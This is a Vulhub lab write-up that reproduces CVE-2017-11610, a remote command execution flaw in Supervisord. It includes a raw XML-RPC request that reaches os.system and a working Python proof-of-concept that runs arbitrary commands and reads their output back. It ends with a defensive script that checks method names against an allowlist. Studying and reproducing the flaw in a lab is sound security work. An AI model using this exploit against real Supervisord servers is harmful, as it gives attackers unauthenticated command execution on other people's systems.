Vulhub vulnerability reproduction 67: Supervisor
2022-07-06 05:16:00 【Revenge_ scan】
CVE-2017-11610: Supervisord remote command execution vulnerability
Preface
Supervisor (http://supervisord.org/) is a client/server service written in Python. It is a process management tool for Linux/Unix systems (Windows is not supported) that makes it easy to monitor, start, stop and restart one or more processes.
Reference links:
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
- https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
Vulnerability environment
Target host: 192.168.4.10 (ubuntu)
```
# docker-compose build
docker-compose up -d
```
After the environment starts, visit `http://your-ip:9001` to see the Supervisord web page.
Vulnerability testing
Execute arbitrary commands directly :
```
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```
Checking inside the container confirms that `/tmp/success` was created.
## A POC that echoes command output directly
@Ricter proposed an idea on Weibo that works very well: write the output of the executed command into the log file, then call Supervisord's built-in `readLog` method to read that log file and obtain the result.
A simple POC, [poc.py](poc.py), is posted directly below:
```python
#!/usr/bin/env python3
import xmlrpc.client
import sys

target = sys.argv[1]   # e.g. http://your-ip:9001/RPC2
command = sys.argv[2]  # command to execute on the target

with xmlrpc.client.ServerProxy(target) as proxy:
    # Remember how much of the log already exists
    old = getattr(proxy, 'supervisor.readLog')(0, 0)
    # Locate supervisord's own log file through attribute traversal
    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
    # Run the command and append its output to the log file
    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
    # Read the log again and print only the newly appended part
    result = getattr(proxy, 'supervisor.readLog')(0, 0)
    print(result[len(old):])
```
Run it with Python 3 to get the command output: `./poc.py "http://your-ip:9001/RPC2" "command"`:
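The root cause above is that the XML-RPC dispatcher resolved every dotted segment of the method name with `getattr`, so a name could walk from the `supervisor` namespace down to `os.system`. As an added defensive illustration (not code from this write-up or from the Supervisor project), the following checks a `/RPC2` request body against a hypothetical allowlist of `namespace.method` names and flags anything that tries deeper traversal; the allowlist contents and the sample bodies are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed samples: the methodCall from the write-up above, and a benign call.
MALICIOUS_BODY = """<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params><param><string>touch /tmp/success</string></param></params>
</methodCall>"""

BENIGN_BODY = """<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.getAllProcessInfo</methodName>
<params></params>
</methodCall>"""

# Hypothetical allowlist: namespace -> public RPC methods it exposes (illustrative subset).
ALLOWED = {
    "supervisor": {"getAllProcessInfo", "readLog", "getState", "startProcess", "stopProcess"},
    "system": {"listMethods", "methodHelp"},
}


def method_name(body: str) -> str:
    """Extract <methodName> from an XML-RPC methodCall body.
    (For untrusted input in production, parse with defusedxml instead.)"""
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not a methodCall")
    node = root.find("methodName")
    if node is None or not node.text:
        raise ValueError("missing methodName")
    return node.text.strip()


def is_allowed(name: str, allowed=ALLOWED) -> bool:
    """Only exactly 'namespace.method' with both parts on the allowlist passes;
    any extra dotted segment (attribute traversal) or private name is rejected."""
    parts = name.split(".")
    if len(parts) != 2 or parts[1].startswith("_"):
        return False
    namespace, method = parts
    return method in allowed.get(namespace, ())


def classify(body: str):
    """Return ('allow'|'alert'|'reject', detail) for one request body."""
    try:
        name = method_name(body)
    except (ET.ParseError, ValueError):
        return ("reject", "malformed methodCall")
    return ("allow", name) if is_allowed(name) else ("alert", name)
```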